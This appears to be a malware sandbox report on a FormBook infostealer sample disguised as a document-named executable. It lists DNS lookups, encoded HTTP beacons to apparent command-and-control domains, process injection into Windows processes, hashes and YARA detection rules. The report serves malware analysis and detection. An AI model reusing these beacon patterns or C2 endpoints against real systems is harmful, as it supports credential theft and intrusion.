Jul 1, 2024 15:29:09.667346001 CEST	1.1.1.1	192.168.2.7	0xc648	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:29:09.667346001 CEST	1.1.1.1	192.168.2.7	0xc648	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:29:30.417577982 CEST	1.1.1.1	192.168.2.7	0x2bc7	No error (0)	www.asmauardotreschicshoes.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:29:30.417577982 CEST	1.1.1.1	192.168.2.7	0x2bc7	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:10.427697897 CEST	1.1.1.1	192.168.2.7	0xfa7d	No error (0)	www.femininequantumflowcoach.com	femininequantumflowcoach.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:30:10.427697897 CEST	1.1.1.1	192.168.2.7	0xfa7d	No error (0)	femininequantumflowcoach.com		192.0.78.25	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:10.427697897 CEST	1.1.1.1	192.168.2.7	0xfa7d	No error (0)	femininequantumflowcoach.com		192.0.78.24	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:31.208904028 CEST	1.1.1.1	192.168.2.7	0x2af4	Name error (3)	www.wizardatm.com	none	none	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:51.977305889 CEST	1.1.1.1	192.168.2.7	0xe394	No error (0)	www.zangbreaker.com	zangbreaker.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:30:51.977305889 CEST	1.1.1.1	192.168.2.7	0xe394	No error (0)	zangbreaker.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:30:51.977305889 CEST	1.1.1.1	192.168.2.7	0xe394	No error (0)	zangbreaker.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:12.166419029 CEST	1.1.1.1	192.168.2.7	0x794	No error (0)	www.babyscan.xyz		3.64.163.50	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:32.761506081 CEST	1.1.1.1	192.168.2.7	0x76ff	No error (0)	www.scarytube.world		13.248.169.48	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:32.761506081 CEST	1.1.1.1	192.168.2.7	0x76ff	No error (0)	www.scarytube.world		76.223.54.146	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:31:53.218349934 CEST	1.1.1.1	192.168.2.7	0x3d4c	No error (0)	www.robottts.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:13.728060007 CEST	1.1.1.1	192.168.2.7	0xb5f4	No error (0)	www.gb-electric-wheelchairs-8j.bond		185.53.179.91	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:34.335988998 CEST	1.1.1.1	192.168.2.7	0xfdf8	No error (0)	www.lostaino.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:32:34.335988998 CEST	1.1.1.1	192.168.2.7	0xfdf8	No error (0)	ext-sq.squarespace.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:34.335988998 CEST	1.1.1.1	192.168.2.7	0xfdf8	No error (0)	ext-sq.squarespace.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:34.335988998 CEST	1.1.1.1	192.168.2.7	0xfdf8	No error (0)	ext-sq.squarespace.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:34.335988998 CEST	1.1.1.1	192.168.2.7	0xfdf8	No error (0)	ext-sq.squarespace.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Jul 1, 2024 15:32:56.049114943 CEST	1.1.1.1	192.168.2.7	0x2f27	No error (0)	www.modleavedepts.online	modleavedepts.online		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 15:32:56.049114943 CEST	1.1.1.1	192.168.2.7	0x2f27	No error (0)	modleavedepts.online		104.194.9.178	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.cn-brand.com

www.asmauardotreschicshoes.com

www.femininequantumflowcoach.com

www.zangbreaker.com

www.babyscan.xyz

www.scarytube.world

www.robottts.com

www.gb-electric-wheelchairs-8j.bond

www.lostaino.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	52.86.6.113	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:29:09.673186064 CEST	173	OUT	GET /ts59/?7n=6XBHEvjpc5M3V6LIfIX8DkkGcsaew2r6P99WVPRIfudOyKrWJ/Ql+0StQIWY9mDv/yxfQ54Ieg==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.cn-brand.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 15:29:10.149399042 CEST	170	IN	HTTP/1.1 302 Found content-length: 0 date: Mon, 01 Jul 2024 13:29:09 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=cn-brand.com connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	23.227.38.74	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:29:30.423557043 CEST	187	OUT	GET /ts59/?7n=mlngg5Tq8mAbovLDpSTQPdURm3XRXD2izxcBP0x82yVhlreLb+x9gDDmRHWXZVcg0gqB6qNybQ==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.asmauardotreschicshoes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 15:29:30.898504019 CEST	1236	IN	HTTP/1.1 403 Forbidden Date: Mon, 01 Jul 2024 13:29:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4514 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Mon, 01 Jul 2024 13:29:45 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HtJyd%2Bvz2%2F3a0dF9fXmG6o9he9firTEuMYsDco1AoWWycrEkIXplX47vWYl43fhfRrcZco4ffTEQRvbkk9QywI5EJytBkul4RumcI14FWQDYKiFWXIYzHdUmXPtRIfy7o96tan3DNtmCyFgSZL0hg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=7.999897 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Download-Options: noopen Server: cloudflare CF-RAY: 89c6becfcb3e43ac-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloud
Jul 1, 2024 15:29:30.898529053 CEST	1236	IN	Data Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" conte
Jul 1, 2024 15:29:30.898541927 CEST	1236	IN	Data Raw: 62 6c 65 5f 74 6f 5f 61 63 63 65 73 73 22 3e 59 6f 75 20 61 72 65 20 75 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 3c 2f 73 70 61 6e 3e 20 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d Data Ascii: ble_to_access">You are unable to access</span> myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full">
Jul 1, 2024 15:29:30.898679018 CEST	1236	IN	Data Raw: 6e 20 74 68 69 73 20 70 61 67 65 20 63 61 6d 65 20 75 70 20 61 6e 64 20 74 68 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 20 66 6f 75 6e 64 20 61 74 20 74 68 65 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 Data Ascii: n this page came up and the Cloudflare Ray ID found at the bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text
Jul 1, 2024 15:29:30.898690939 CEST	450	IN	Data Raw: 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 Data Ascii: b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49708	192.0.78.25	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:30:10.443048954 CEST	189	OUT	GET /ts59/?7n=axrGY/tHsVnNl5QwUQiA9FSVXiVl+cKu3zfjN+PR7I9fZgnn7wX4yTtY89Vmc3+NwxjOyoKz1w==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.femininequantumflowcoach.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 15:30:10.936852932 CEST	526	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 01 Jul 2024 13:30:10 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.femininequantumflowcoach.com/ts59/?7n=axrGY/tHsVnNl5QwUQiA9FSVXiVl+cKu3zfjN+PR7I9fZgnn7wX4yTtY89Vmc3+NwxjOyoKz1w==&2d8=3fe8kxnx8zVX-2L X-ac: 2.jfk _dfw BYPASS Alt-Svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49709	3.33.130.190	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:30:51.983298063 CEST	176	OUT	GET /ts59/?7n=/870L+f5uYuMeX+RQ7xUOiQTdWqbXz9Ki2XQMm/qjwY6yFcouCApqHiIgf95TupcdCgvNrXz6Q==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.zangbreaker.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 15:30:52.470468998 CEST	354	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 13:30:52 GMT Content-Type: text/html Content-Length: 214 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6e 3d 2f 38 37 30 4c 2b 66 35 75 59 75 4d 65 58 2b 52 51 37 78 55 4f 69 51 54 64 57 71 62 58 7a 39 4b 69 32 58 51 4d 6d 2f 71 6a 77 59 36 79 46 63 6f 75 43 41 70 71 48 69 49 67 66 39 35 54 75 70 63 64 43 67 76 4e 72 58 7a 36 51 3d 3d 26 32 64 38 3d 33 66 65 38 6b 78 6e 78 38 7a 56 58 2d 32 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7n=/870L+f5uYuMeX+RQ7xUOiQTdWqbXz9Ki2XQMm/qjwY6yFcouCApqHiIgf95TupcdCgvNrXz6Q==&2d8=3fe8kxnx8zVX-2L"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49710	3.64.163.50	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:31:12.172122955 CEST	173	OUT	GET /ts59/?7n=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhppaUL+BqZnD0gHwuuw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.babyscan.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49711	13.248.169.48	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:31:32.789277077 CEST	176	OUT	GET /ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.scarytube.world Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 15:31:33.258588076 CEST	354	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 01 Jul 2024 13:31:33 GMT Content-Type: text/html Content-Length: 214 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6e 3d 35 4b 7a 75 63 30 38 4e 48 5a 38 74 31 30 6f 73 52 79 65 39 34 5a 51 76 4f 44 4c 50 6d 38 6d 4a 74 79 36 34 36 63 2f 64 70 41 67 2f 7a 4c 5a 70 57 31 62 6f 30 79 67 2f 70 75 65 36 4c 49 66 64 75 6d 5a 44 75 41 5a 48 57 77 3d 3d 26 32 64 38 3d 33 66 65 38 6b 78 6e 78 38 7a 56 58 2d 32 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49712	3.64.163.50	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:31:53.227277994 CEST	173	OUT	GET /ts59/?7n=cK9IFJet6pmJE86ae8KOHfirNs8pECX6NYxzkQ3MXT6vCvPIzrd8O4FQURVhV/WvD5THDom2OA==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.robottts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49713	185.53.179.91	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:32:13.734174013 CEST	192	OUT	GET /ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.gb-electric-wheelchairs-8j.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49714	198.185.159.144	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 15:32:34.341759920 CEST	173	OUT	GET /ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L HTTP/1.1 Host: www.lostaino.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 1, 2024 15:32:34.815437078 CEST	1236	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 2061 Content-Type: text/html; charset=UTF-8 Date: Mon, 01 Jul 2024 13:32:34 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: JHJ14fjd/v9rYknTo Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED] Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
Jul 1, 2024 15:32:34.815469980 CEST	1124	IN	Data Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {

Target ID:	0
Start time:	09:28:33
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe"
Imagebase:	0xd80000
File size:	1'128'960 bytes
MD5 hash:	E03CEFCD99FEAF7CA8FD37A4BEC8280C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	09:28:33
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe"
Imagebase:	0xef0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Target ID:	3
Start time:	09:28:34
Start date:	01/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff70ffd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.3822306235.000000000EBD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	09:28:36
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\control.exe"
Imagebase:	0xc90000
File size:	149'504 bytes
MD5 hash:	EBC29AA32C57A54018089CFC9CACAFE8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 